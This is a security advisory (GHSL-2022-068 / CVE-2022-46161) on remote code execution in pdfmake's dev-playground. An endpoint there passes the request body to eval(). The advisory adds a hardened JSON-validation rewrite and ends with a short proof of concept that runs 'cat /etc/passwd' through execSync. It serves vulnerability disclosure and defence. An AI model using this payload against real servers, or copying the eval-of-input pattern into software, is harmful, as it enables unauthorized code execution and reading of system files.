CVE-2022-46161: GHSL-2022-068: Remote Code Execution (RCE) in PDFMake - CVE-2022-46161
pdfmake is an open source client/server side PDF printing library in pure JavaScript. In versions up to and including 0.2.5, pdfmake contains an unsafe evaluation of user-controlled input. Users of pdfmake are thus subject to arbitrary code execution in the context of the process running the pdfmake code. There are no known fixes for this issue. Users are advised to restrict access to trusted user input.
Coordinated Disclosure Timeline
- 2022-08-23: Report sent to liborm85 at gmail.com
- 2022-10-10: Issue opened asking for a security contact
- 2022-11-21: Deadline expired, so publishing in accordance with the GitHub Security Lab disclosure policy
Summary
The dev-playground of pdfmake lacks sandboxing/sanitization of the data sent to the server (which flows to eval()).
Product
pdfmake
Tested Version
0.2.5
Details
Issue: RCE in dev-playground.js (GHSL-2022-068)
The /pdf endpoint, in charge of creating a PDF from a given piece of JS code, does not sanitize user input, nor does the execution take place in a sandboxed environment.
    app.post('/pdf', function (req, res) {
        // the request body is passed straight to eval() without validation or sandboxing
        eval(req.body.content);
    });
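The following is an added example, not code from the pdfmake project, showing how the same endpoint can accept a pdfmake document definition as data instead of as a script. The request body is parsed with JSON.parse, which never executes anything, and the resulting object is checked to contain only plain data (strings, numbers, booleans, null, arrays and plain objects) within bounded size, depth and node count, so that CWE-94 and CWE-400 are both addressed. The limits, the `handlePdfRequest` wrapper and the idea of handing the validated object to pdfmake's printer afterwards are assumptions of this example; the `content` field is pdfmake's real top-level document definition key.

```javascript
// Added example (not pdfmake's own code): replace eval() of the request body
// with strict parsing of a pdfmake document definition as JSON data.
// Assumed limits; tune them for the deployment.
const MAX_BODY_BYTES = 64 * 1024; // bound input size (CWE-400)
const MAX_DEPTH = 32;             // bound nesting depth (CWE-400)
const MAX_NODES = 10000;          // bound total element count (CWE-400)

// Recursively verify that a parsed value contains only plain data.
// Functions, class instances and prototype-tampering keys are rejected.
function checkPlainData(value, depth, counter) {
  if (depth > MAX_DEPTH) throw new Error('document too deeply nested');
  if (++counter.n > MAX_NODES) throw new Error('document has too many nodes');
  const t = typeof value;
  if (value === null || t === 'string' || t === 'number' || t === 'boolean') {
    return;
  }
  if (Array.isArray(value)) {
    for (const item of value) checkPlainData(item, depth + 1, counter);
    return;
  }
  if (t === 'object' && Object.getPrototypeOf(value) === Object.prototype) {
    for (const key of Object.keys(value)) {
      // JSON.parse keeps "__proto__" as an own key; refuse it anyway so the
      // object never reaches code that might merge it into another object.
      if (key === '__proto__' || key === 'constructor' || key === 'prototype') {
        throw new Error(`forbidden key: ${key}`);
      }
      checkPlainData(value[key], depth + 1, counter);
    }
    return;
  }
  throw new Error(`unsupported value type: ${t}`);
}

// Parse the raw request body as data. Anything that is not valid JSON
// (for example a JavaScript program) is rejected before it could ever run.
function parseDocDefinition(rawBody) {
  if (typeof rawBody !== 'string') throw new Error('body must be a string');
  if (Buffer.byteLength(rawBody, 'utf8') > MAX_BODY_BYTES) {
    throw new Error('body too large');
  }
  let dd;
  try {
    dd = JSON.parse(rawBody);
  } catch (e) {
    throw new Error('body is not a JSON document definition');
  }
  checkPlainData(dd, 0, { n: 0 });
  if (Object.getPrototypeOf(dd) !== Object.prototype || !('content' in dd)) {
    throw new Error('document definition must be an object with a content field');
  }
  return dd;
}

// Hardened stand-in for the /pdf handler (assumed shape): the body is
// validated data, never code. A real handler would pass `docDefinition`
// to pdfmake's printer; here the validated object is simply returned.
function handlePdfRequest(rawBody) {
  try {
    const dd = parseDocDefinition(rawBody);
    return { status: 200, docDefinition: dd };
  } catch (e) {
    return { status: 400, error: e.message };
  }
}

// Constructed sample inputs: a valid definition and a JavaScript snippet.
console.log(handlePdfRequest('{"content":["hello"]}').status);       // 200
console.log(handlePdfRequest('dd = { content: ["hi"] }').status);    // 400
```

With this shape the playground can still take a document definition from the client, but a body that is a program rather than a JSON object is a 400 response instead of a code path into eval(); the depth and size bounds also stop an oversized or deeply nested definition from exhausting the process.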
Impact
This issue may lead to a variety of exploit primitives, including Remote Code Execution (RCE) or uncontrolled resource consumption.
Resources
- CWE-94: Improper Control of Generation of Code (‘Code Injection’)
- CWE-400: Uncontrolled Resource Consumption
POC
Providing the following snippet will cause pdfmake to dump the contents of /etc/passwd into the generated PDF document:
    const {execSync} = require('node:child_process');
    var out = execSync('cat /etc/passwd');
    dd = {
        content: [
            out.toString()
        ]
    }
- CVE-2022-46161
Credit
This issue was discovered and reported by GHSL team member @VulnerabilityViper (Ryan Finn).
You can contact the GHSL team at [email protected], please include a reference to GHSL-2022-068 in any communication regarding this issue.